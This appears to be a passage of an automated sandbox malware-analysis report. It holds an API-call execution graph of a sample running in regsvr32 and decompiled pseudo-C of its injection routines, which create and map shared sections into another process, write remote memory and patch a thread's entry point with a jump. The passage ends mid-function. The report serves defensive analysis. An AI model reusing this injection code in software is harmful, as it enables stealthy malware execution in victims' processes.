                                                                                                                                                                                              execution_graph 22703 42a2a2b 40 API calls 22711 42abaab GetCurrentProcessId 22704 42a1228 53 API calls 22216 42a632e 22217 42a633e ExitProcess 22216->22217 22686 42af0ad lstrlenA RtlAllocateHeap HeapFree memset 22691 42a5922 RtlAllocateHeap HeapFree memset 22687 42b44a0 6 API calls 22696 42a29a1 16 API calls 22705 42ade26 10 API calls 22688 42a28a4 8 API calls 22732 42a27bb 8 API calls 22182 830790 22183 830bf9 22182->22183 22205 82f9d0 22183->22205 22185 830d2f 22208 82ff20 VirtualAlloc 22185->22208 22187 830d68 22188 830d6c 22187->22188 22189 82f9d0 VirtualAlloc 22187->22189 22191 830fc9 22189->22191 22190 83102b 22191->22190 22192 83115d 22191->22192 22212 830340 22191->22212 22193 830340 2 API calls 22192->22193 22195 83118a 22193->22195 22198 830340 2 API calls 22195->22198 22197 830340 2 API calls 22199 831130 22197->22199 22200 8311b7 22198->22200 22201 830340 2 API calls 22199->22201 22202 830340 2 API calls 22200->22202 22201->22192 22203 8311e4 22202->22203 22204 830340 2 API calls 22203->22204 22204->22190 22206 82fa11 22205->22206 22207 82fa44 VirtualAlloc 22206->22207 22207->22185 22209 82ff88 22208->22209 22210 83011f 22209->22210 22211 8300f1 VirtualProtect 22209->22211 22210->22187 22211->22209 22213 830430 22212->22213 22214 83036e 22212->22214 22213->22197 22214->22213 22215 8303c6 VirtualProtect VirtualProtect 22214->22215 22215->22213 22692 42a353c 91 API calls 22678 42b083c RtlAllocateHeap 22689 42a88b0 GetLastError HeapFree memset 22733 42a1fb0 9 API calls 22698 42a59b1 14 API calls 22734 42a33b1 memset lstrlenW _ftol2_sse 22722 42a1f36 RtlAllocateHeap HeapFree memset MultiByteToWideChar 22699 42a598e 12 API calls 22713 42a6e8c memset K32GetModuleFileNameExW lstrcpynW RtlAllocateHeap 22700 42a298d HeapFree memset 22679 42af402 memset lstrcmpiA GetLastError 22735 42a2782 40 API calls 22724 42a1301 92 API calls 22736 42a2b84 33 API calls 22680 42a201c 13 API calls 22715 42a2297 10 API calls 22739 42a5bea 12 API calls 22716 42a2aeb 9 API calls 22694 42a296e 15 API calls 22218 42a64ef 22219 42a64fd 22218->22219 22221 42a6555 22218->22221 22247 42a8bc9 HeapCreate 22219->22247 22222 42a6502 22248 42a9591 22222->22248 22231 42a655a 22268 42a8baf 22231->22268 22232 42a6550 22234 42a8baf 2 API calls 22232->22234 22234->22221 22240 42a65b1 CreateThread 22240->22221 22328 42a6298 22240->22328 22241 42af05c 8 API calls 22242 42a658c 22241->22242 22281 42a6370 6 API calls 22242->22281 22244 42a6596 22282 42a8bf4 22244->22282 22247->22222 22287 42a8bde RtlAllocateHeap 22248->22287 22250 42a6507 22251 42b3cd5 22250->22251 22252 42b3d0a 22251->22252 22288 42a8c43 22252->22288 22254 42a6515 22255 42af05c 22254->22255 22292 42a9dd8 22255->22292 22258 42af07e GetModuleHandleA 22260 42af08d 22258->22260 22259 42af086 LoadLibraryA 22259->22260 22263 42af09b 22260->22263 22295 42af011 22260->22295 22300 42a8b9c 22263->22300 22265 42a9df2 22318 42a8ac6 22265->22318 22267 42a653c GetFileAttributesW 22267->22231 22267->22232 22269 42a8bbd 22268->22269 22270 42a655f 22268->22270 22271 42a8bf4 2 API calls 22269->22271 22272 42a109a 22270->22272 22271->22270 22273 42a8ac6 2 API calls 22272->22273 22274 42a10b5 22273->22274 22275 42a9cb5 22274->22275 22276 42a9cd1 22275->22276 22279 42a6573 22276->22279 22324 42a8bde RtlAllocateHeap 22276->22324 22278 42a9ce4 22278->22279 22280 42a8bf4 2 API calls 22278->22280 22279->22240 22279->22241 22280->22279 22281->22244 22283 42a65a1 22282->22283 22285 42a8bfe 22282->22285 22283->22240 22285->22283 22325 42a8d6d 22285->22325 22287->22250 22291 42a8bde RtlAllocateHeap 22288->22291 22290 42a8c54 22290->22254 22291->22290 22304 42a89ef 22292->22304 22311 42a8bde RtlAllocateHeap 22295->22311 22297 42af052 22297->22263 22299 42af023 22299->22297 22312 42aeebb 22299->22312 22301 42a652b 22300->22301 22302 42a8ba4 22300->22302 22301->22265 22303 42a8bf4 2 API calls 22302->22303 22303->22301 22305 42a8a12 lstrlenA 22304->22305 22307 42a8a78 22305->22307 22309 42a8a81 22305->22309 22310 42a8bde RtlAllocateHeap 22307->22310 22309->22258 22309->22259 22310->22309 22311->22299 22313 42aef2f 22312->22313 22314 42aeed4 22312->22314 22313->22299 22314->22313 22315 42aef87 LoadLibraryA 22314->22315 22315->22313 22316 42aef95 GetProcAddress 22315->22316 22316->22313 22317 42aefa1 22316->22317 22317->22313 22319 42a8ae4 lstrlenA 22318->22319 22323 42a8bde RtlAllocateHeap 22319->22323 22322 42a8b60 22322->22267 22322->22322 22323->22322 22324->22278 22326 42a8d76 memset 22325->22326 22327 42a8c2e HeapFree 22325->22327 22326->22327 22327->22283 22340 42a6412 22328->22340 22332 42a62b3 22333 42a62a9 22333->22332 22334 42a62e3 22333->22334 22403 42ad804 22333->22403 22336 42a631a 22334->22336 22337 42a6313 22334->22337 22336->22332 22420 42a35a1 RtlAllocateHeap lstrlenW _ftol2_sse 22336->22420 22419 42a611b 91 API calls 22337->22419 22341 42af05c 8 API calls 22340->22341 22342 42a6426 22341->22342 22343 42af05c 8 API calls 22342->22343 22344 42a643f 22343->22344 22345 42af05c 8 API calls 22344->22345 22346 42a6458 22345->22346 22347 42af05c 8 API calls 22346->22347 22348 42a6471 22347->22348 22349 42af05c 8 API calls 22348->22349 22350 42a648a 22349->22350 22351 42af05c 8 API calls 22350->22351 22352 42a64a1 22351->22352 22353 42af05c 8 API calls 22352->22353 22354 42a64b8 22353->22354 22355 42af05c 8 API calls 22354->22355 22356 42a64cf 22355->22356 22357 42af05c 8 API calls 22356->22357 22358 42a629d GetOEMCP 22357->22358 22359 42adf3d 22358->22359 22421 42a8bde RtlAllocateHeap 22359->22421 22361 42adf58 22362 42adf63 GetCurrentProcessId 22361->22362 22402 42ae2b8 22361->22402 22363 42adf7b 22362->22363 22422 42ac879 22363->22422 22365 42adfce 22366 42adfdf 22365->22366 22429 42ac8c9 22365->22429 22438 42af3a3 22366->22438 22371 42ae014 22372 42ae05e GetLastError 22371->22372 22373 42ae064 GetSystemMetrics 22371->22373 22372->22373 22375 42ae08b 22373->22375 22447 42ac6ce 22375->22447 22380 42ae0c6 22464 42ac6e4 22380->22464 22385 42a8d6d memset 22386 42ae11d GetVersionExA 22385->22386 22483 42add39 22386->22483 22390 42ae13b GetWindowsDirectoryW 22391 42a9df2 2 API calls 22390->22391 22392 42ae15e 22391->22392 22393 42a8baf 2 API calls 22392->22393 22394 42ae198 22393->22394 22396 42ae1d0 22394->22396 22506 42a9e51 22394->22506 22489 42b351a 22396->22489 22402->22333 22577 42ad6dc 22403->22577 22406 42ad950 22406->22334 22408 42ad841 22409 42ad945 22408->22409 22410 42ad933 22408->22410 22413 42a8d6d memset 22408->22413 22416 42ad8b4 GetLastError 22408->22416 22418 42ad8de FindCloseChangeNotification 22408->22418 22589 42abc84 22408->22589 22594 42ad959 22408->22594 22411 42a8bf4 2 API calls 22409->22411 22410->22409 22412 42a8bf4 2 API calls 22410->22412 22411->22406 22412->22410 22413->22408 22607 42ada57 ResumeThread 22416->22607 22418->22408 22419->22332 22420->22332 22421->22361 22423 42ac890 22422->22423 22424 42ac894 22423->22424 22510 42ac862 22423->22510 22424->22365 22427 42ac8b9 FindCloseChangeNotification 22428 42ac8a5 22427->22428 22428->22365 22523 42ac79e GetCurrentThread OpenThreadToken 22429->22523 22432 42ac97f 22432->22366 22433 42ac7f5 6 API calls 22437 42ac8fd FindCloseChangeNotification 22433->22437 22435 42ac975 22436 42a8bf4 2 API calls 22435->22436 22436->22432 22437->22432 22437->22435 22440 42af3c2 22438->22440 22439 42ae009 22442 42af368 22439->22442 22440->22439 22528 42a98bd RtlAllocateHeap 22440->22528 22443 42af37f 22442->22443 22444 42af39f 22443->22444 22529 42a98bd RtlAllocateHeap 22443->22529 22444->22371 22446 42af38c 22446->22371 22530 42ac5ec 22447->22530 22449 42ac6e2 22450 42ac4c1 22449->22450 22451 42ac4dc 22450->22451 22452 42a9dd8 2 API calls 22451->22452 22453 42ac4e6 22452->22453 22545 42b3674 22453->22545 22455 42ac531 22456 42a8b9c 2 API calls 22455->22456 22458 42ac53d 22456->22458 22457 42ac4fb 22457->22455 22459 42b3674 2 API calls 22457->22459 22460 42a99df 22458->22460 22459->22457 22461 42a99eb MultiByteToWideChar 22460->22461 22462 42a99e6 22460->22462 22463 42a99ff 22461->22463 22462->22380 22463->22380 22465 42a9dd8 2 API calls 22464->22465 22466 42ac6fd 22465->22466 22467 42a9dd8 2 API calls 22466->22467 22469 42ac709 22467->22469 22468 42ac799 22477 42aca46 22468->22477 22469->22468 22470 42b3674 2 API calls 22469->22470 22471 42ac75a 22469->22471 22470->22469 22472 42b3674 2 API calls 22471->22472 22473 42ac785 22471->22473 22472->22471 22474 42a8b9c 2 API calls 22473->22474 22475 42ac791 22474->22475 22476 42a8b9c 2 API calls 22475->22476 22476->22468 22478 42aca5e 22477->22478 22479 42aca62 22478->22479 22480 42ac7f5 6 API calls 22478->22480 22479->22385 22482 42aca76 22480->22482 22481 42a8bf4 2 API calls 22481->22479 22482->22479 22482->22481 22484 42add4e GetCurrentProcess IsWow64Process 22483->22484 22485 42add5f 22483->22485 22484->22485 22486 42add62 22485->22486 22487 42add6c 22486->22487 22488 42add71 GetSystemInfo 22486->22488 22487->22390 22488->22390 22490 42ae299 22489->22490 22491 42b3525 22489->22491 22493 42a96da 22490->22493 22491->22490 22492 42b3674 2 API calls 22491->22492 22492->22491 22550 42a9662 22493->22550 22496 42adae3 22497 42adcc8 22496->22497 22498 42a9dd8 2 API calls 22497->22498 22500 42adcf8 22497->22500 22502 42a8b9c 2 API calls 22497->22502 22556 42a9b33 22497->22556 22498->22497 22562 42ab96a CreateToolhelp32Snapshot 22500->22562 22502->22497 22503 42add14 22505 42add31 22503->22505 22571 42a9c2c HeapFree memset 22503->22571 22505->22402 22507 42a8d6d memset 22506->22507 22508 42a9e65 _vsnwprintf 22507->22508 22509 42a9e82 22508->22509 22509->22396 22513 42ac7f5 GetTokenInformation 22510->22513 22514 42ac817 GetLastError 22513->22514 22521 42ac834 22513->22521 22515 42ac822 22514->22515 22514->22521 22522 42a8bde RtlAllocateHeap 22515->22522 22517 42ac82a 22518 42ac838 GetTokenInformation 22517->22518 22517->22521 22519 42ac84d 22518->22519 22518->22521 22520 42a8bf4 2 API calls 22519->22520 22520->22521 22521->22427 22521->22428 22522->22517 22524 42ac7eb 22523->22524 22525 42ac7bf GetLastError 22523->22525 22524->22432 22524->22433 22525->22524 22526 42ac7cc OpenProcessToken 22525->22526 22526->22524 22528->22439 22529->22446 22531 42a8d6d memset 22530->22531 22532 42ac60e lstrcpynW 22531->22532 22534 42a9df2 2 API calls 22532->22534 22535 42ac643 GetVolumeInformationW 22534->22535 22536 42a8baf 2 API calls 22535->22536 22537 42ac678 22536->22537 22538 42a9e51 2 API calls 22537->22538 22539 42ac699 lstrcatW 22538->22539 22543 42aa456 22539->22543 22542 42ac6bf 22542->22449 22544 42aa45e CharUpperBuffW 22543->22544 22544->22542 22546 42b3684 22545->22546 22547 42b36b7 lstrlenW 22546->22547 22548 42b36d4 _ftol2_sse 22547->22548 22548->22457 22551 42a9672 22550->22551 22552 42b3674 2 API calls 22551->22552 22555 42a968d 22552->22555 22553 42a96c1 22553->22496 22554 42b3674 2 API calls 22554->22555 22555->22553 22555->22554 22558 42a9b47 22556->22558 22572 42a8bde RtlAllocateHeap 22558->22572 22559 42a9c16 22559->22497 22561 42a9b9f 22561->22559 22573 42a8bde RtlAllocateHeap 22561->22573 22563 42ab9bf 22562->22563 22564 42ab994 22562->22564 22563->22503 22565 42a8d6d memset 22564->22565 22566 42ab9a6 Process32First 22565->22566 22566->22563 22567 42ab9cd 22566->22567 22568 42ab9df Process32Next 22567->22568 22569 42ab9f2 FindCloseChangeNotification 22567->22569 22574 42ada6d 22567->22574 22568->22567 22568->22569 22569->22563 22571->22503 22572->22561 22573->22561 22575 42adacf Sleep 22574->22575 22576 42ada7e 22574->22576 22575->22567 22576->22575 22578 42ad6fb 22577->22578 22608 42a8bde RtlAllocateHeap 22578->22608 22580 42ad7f3 22580->22406 22585 42ab557 22580->22585 22581 42a9df2 2 API calls 22583 42ad796 22581->22583 22582 42a8baf 2 API calls 22582->22583 22583->22580 22583->22581 22583->22582 22609 42a98bd RtlAllocateHeap 22583->22609 22586 42ab570 22585->22586 22610 42ab4a6 22586->22610 22590 42a8d6d memset 22589->22590 22591 42abc9a 22590->22591 22592 42a8d6d memset 22591->22592 22593 42abca7 CreateProcessW 22592->22593 22593->22408 22623 42ad218 22594->22623 22597 42ada49 22670 42ad38b 22597->22670 22602 42a8d6d memset 22603 42ad99f GetThreadContext 22602->22603 22603->22597 22604 42ad9c9 NtProtectVirtualMemory 22603->22604 22604->22597 22605 42ada0b NtWriteVirtualMemory 22604->22605 22605->22597 22606 42ada28 NtProtectVirtualMemory 22605->22606 22606->22597 22607->22408 22608->22583 22609->22583 22611 42b351a 2 API calls 22610->22611 22612 42ab4be 22611->22612 22613 42a9dd8 2 API calls 22612->22613 22614 42ab4e8 22613->22614 22619 42a9e12 22614->22619 22616 42ab546 22617 42a8b9c 2 API calls 22616->22617 22618 42ab551 22617->22618 22618->22408 22620 42a8d6d memset 22619->22620 22621 42a9e26 _vsnprintf 22620->22621 22622 42a9e40 22621->22622 22622->22616 22624 42ad246 22623->22624 22625 42ad234 22623->22625 22626 42a9df2 2 API calls 22624->22626 22625->22624 22627 42ad373 22625->22627 22628 42ad253 22626->22628 22627->22597 22649 42ad447 22627->22649 22629 42a9e51 2 API calls 22628->22629 22630 42ad28c 22629->22630 22631 42a9df2 2 API calls 22630->22631 22632 42ad2ab 22631->22632 22675 42a9a5a RtlAllocateHeap lstrcatW 22632->22675 22634 42ad2c5 22635 42a8baf 2 API calls 22634->22635 22636 42ad2d3 22635->22636 22676 42a9a5a RtlAllocateHeap lstrcatW 22636->22676 22638 42ad2f6 LoadLibraryW 22640 42ad32f 22638->22640 22641 42ad321 22638->22641 22643 42a8bf4 2 API calls 22640->22643 22642 42af011 3 API calls 22641->22642 22642->22640 22644 42ad344 22643->22644 22645 42a8d6d memset 22644->22645 22646 42ad356 22645->22646 22646->22627 22647 42a8bf4 2 API calls 22646->22647 22648 42ad371 22647->22648 22648->22627 22650 42ad47a 22649->22650 22651 42ad49b NtCreateSection 22650->22651 22655 42ad68e 22650->22655 22652 42ad4c4 RegisterClassExA 22651->22652 22651->22655 22653 42ad518 CreateWindowExA 22652->22653 22654 42ad554 NtMapViewOfSection 22652->22654 22653->22654 22657 42ad542 DestroyWindow UnregisterClassA 22653->22657 22654->22655 22662 42ad587 NtMapViewOfSection 22654->22662 22656 42ad6c3 22655->22656 22661 42ad6bf NtUnmapViewOfSection 22655->22661 22658 42ad6cc NtClose 22656->22658 22659 42ad6d7 22656->22659 22657->22654 22658->22659 22659->22597 22659->22602 22661->22656 22662->22655 22663 42ad5ab 22662->22663 22664 42a8c43 RtlAllocateHeap 22663->22664 22665 42ad5bb 22664->22665 22665->22655 22666 42ad5ca VirtualAllocEx WriteProcessMemory 22665->22666 22667 42a8bf4 2 API calls 22666->22667 22668 42ad611 22667->22668 22669 42ad674 lstrlenW 22668->22669 22669->22655 22671 42ad3a2 22670->22671 22672 42ad394 FreeLibrary 22670->22672 22673 42ad3c3 22671->22673 22674 42a8bf4 2 API calls 22671->22674 22672->22671 22673->22408 22674->22673 22675->22634 22676->22638 22717 42a26ec 12 API calls 22690 42a34e1 10 API calls 22707 42a1e66 7 API calls 22727 42a1f65 8 API calls 22740 42a87e5 lstrlenA RtlAllocateHeap 22728 42a377f 18 API calls 22719 42a1ef0 6 API calls 22729 42a334e 14 API calls 22709 42a2a44 37 API calls 22702 42a61c5 97 API calls 22710 82faf0 VirtualAlloc 22695 42a5959 GetLastError 22730 42a3b5d 25 API calls 22685 42a2855 GetLastError RtlAllocateHeap HeapFree memset

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 042AD447 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                              			E042AD447(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x42bf81c; // 0x48efbe8
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E042AF0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x42bf918; // 0x48ef9f0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x42bf818; // 0x48ef8b0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x42bce44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x42bf818; // 0x48ef8b0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E042A8C43( *0x42bf81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E042A8BF4( &_v36, 0x1ac4);
					_t119 =  *0x42bf81c; // 0x48efbe8
					_t155 =  *0x42bf830; // 0x42a0000
					_v36 = _t119;
					 *0x42bf830 = _v8;
					 *0x42bf81c = _t163;
					E042A8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E042AD3C6(_v16, _v8, _v44);
					_t124 = E042AA43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x42bf830 = _t155;
						 *0x42bf81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































                                                                                                                                                                                              0x042ad44d
                                                                                                                                                                                              0x042ad453
                                                                                                                                                                                              0x042ad455
                                                                                                                                                                                              0x042ad459
                                                                                                                                                                                              0x042ad45b
                                                                                                                                                                                              0x042ad45e
                                                                                                                                                                                              0x042ad461
                                                                                                                                                                                              0x042ad464
                                                                                                                                                                                              0x042ad467
                                                                                                                                                                                              0x042ad46a
                                                                                                                                                                                              0x042ad475
                                                                                                                                                                                              0x042ad478
                                                                                                                                                                                              0x042ad47f
                                                                                                                                                                                              0x042ad47f
                                                                                                                                                                                              0x042ad484
                                                                                                                                                                                              0x042ad487
                                                                                                                                                                                              0x042ad489
                                                                                                                                                                                              0x042ad48c
                                                                                                                                                                                              0x042ad495
                                                                                                                                                                                              0x042ad68e
                                                                                                                                                                                              0x042ad68e
                                                                                                                                                                                              0x042ad691
                                                                                                                                                                                              0x042ad694
                                                                                                                                                                                              0x042ad699
                                                                                                                                                                                              0x042ad69f
                                                                                                                                                                                              0x042ad6a2
                                                                                                                                                                                              0x042ad6a2
                                                                                                                                                                                              0x042ad6a5
                                                                                                                                                                                              0x042ad6a9
                                                                                                                                                                                              0x042ad6ab
                                                                                                                                                                                              0x042ad6c0
                                                                                                                                                                                              0x042ad6c0
                                                                                                                                                                                              0x042ad6ca
                                                                                                                                                                                              0x042ad6d4
                                                                                                                                                                                              0x042ad6d4
                                                                                                                                                                                              0x042ad6db
                                                                                                                                                                                              0x042ad6db
                                                                                                                                                                                              0x042ad4a4
                                                                                                                                                                                              0x042ad4be
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad4c4
                                                                                                                                                                                              0x042ad4cc
                                                                                                                                                                                              0x042ad4d4
                                                                                                                                                                                              0x042ad4da
                                                                                                                                                                                              0x042ad4e1
                                                                                                                                                                                              0x042ad4e9
                                                                                                                                                                                              0x042ad4ea
                                                                                                                                                                                              0x042ad4f1
                                                                                                                                                                                              0x042ad4f4
                                                                                                                                                                                              0x042ad4f5
                                                                                                                                                                                              0x042ad4fc
                                                                                                                                                                                              0x042ad4ff
                                                                                                                                                                                              0x042ad506
                                                                                                                                                                                              0x042ad507
                                                                                                                                                                                              0x042ad50a
                                                                                                                                                                                              0x042ad516
                                                                                                                                                                                              0x042ad538
                                                                                                                                                                                              0x042ad540
                                                                                                                                                                                              0x042ad543
                                                                                                                                                                                              0x042ad54e
                                                                                                                                                                                              0x042ad54e
                                                                                                                                                                                              0x042ad540
                                                                                                                                                                                              0x042ad56a
                                                                                                                                                                                              0x042ad579
                                                                                                                                                                                              0x042ad57c
                                                                                                                                                                                              0x042ad581
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad5ab
                                                                                                                                                                                              0x042ad5bb
                                                                                                                                                                                              0x042ad5bd
                                                                                                                                                                                              0x042ad5c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad5d9
                                                                                                                                                                                              0x042ad5ec
                                                                                                                                                                                              0x042ad600
                                                                                                                                                                                              0x042ad60c
                                                                                                                                                                                              0x042ad611
                                                                                                                                                                                              0x042ad616
                                                                                                                                                                                              0x042ad61c
                                                                                                                                                                                              0x042ad622
                                                                                                                                                                                              0x042ad62a
                                                                                                                                                                                              0x042ad63a
                                                                                                                                                                                              0x042ad646
                                                                                                                                                                                              0x042ad650
                                                                                                                                                                                              0x042ad658
                                                                                                                                                                                              0x042ad65d
                                                                                                                                                                                              0x042ad660
                                                                                                                                                                                              0x042ad668
                                                                                                                                                                                              0x042ad668
                                                                                                                                                                                              0x042ad668
                                                                                                                                                                                              0x042ad66b
                                                                                                                                                                                              0x042ad66f
                                                                                                                                                                                              0x042ad670
                                                                                                                                                                                              0x042ad674
                                                                                                                                                                                              0x042ad678
                                                                                                                                                                                              0x042ad681
                                                                                                                                                                                              0x042ad687
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad687
                                                                                                                                                                                              0x042ad662
                                                                                                                                                                                              0x042ad666
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad666

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(042AD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 042AD4B9
                                                                                                                                                                                              • RegisterClassExA.USER32(?), ref: 042AD50D
                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 042AD538
                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 042AD543
                                                                                                                                                                                              • UnregisterClassA.USER32 ref: 042AD54E
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(042AD982,00000000), ref: 042AD579
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(042AD982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 042AD5A0
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 042AD5E6
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 042AD600
                                                                                                                                                                                                • Part of subcall function 042A8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 042A8C3A
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,042A61C5), ref: 042AD678
                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 042AD6C0
                                                                                                                                                                                              • NtClose.NTDLL(00000000), ref: 042AD6D4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                                              • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                                              • API String ID: 494031690-2640591812
                                                                                                                                                                                              • Opcode ID: bc35cf97d77579b51bd611f0e4b1ef9e7aa892dc1eaab258334078021333d573
                                                                                                                                                                                              • Instruction ID: 65cf8acc24700fdd4cd23e6d38a354ab4b7e87c78bcd78f68cb8be8b0ec72ae7
                                                                                                                                                                                              • Opcode Fuzzy Hash: bc35cf97d77579b51bd611f0e4b1ef9e7aa892dc1eaab258334078021333d573
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6811EB1B10209AFDB10DF99ED88EDEBBB9FB08704F154069E905E7250D774AE41CBA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AD959 Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 211 42ad959-42ad972 call 42ad218 214 42ada4b-42ada56 call 42ad38b 211->214 215 42ad978-42ad986 call 42ad447 211->215 215->214 220 42ad98c-42ad9c3 call 42a8d6d GetThreadContext 215->220 220->214 223 42ad9c9-42ada09 NtProtectVirtualMemory 220->223 224 42ada0b-42ada26 NtWriteVirtualMemory 223->224 225 42ada49 223->225 224->225 226 42ada28-42ada47 NtProtectVirtualMemory 224->226 225->214 226->214 226->225
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AD959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E042AD218(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E042AD447( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E042A8D6D( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
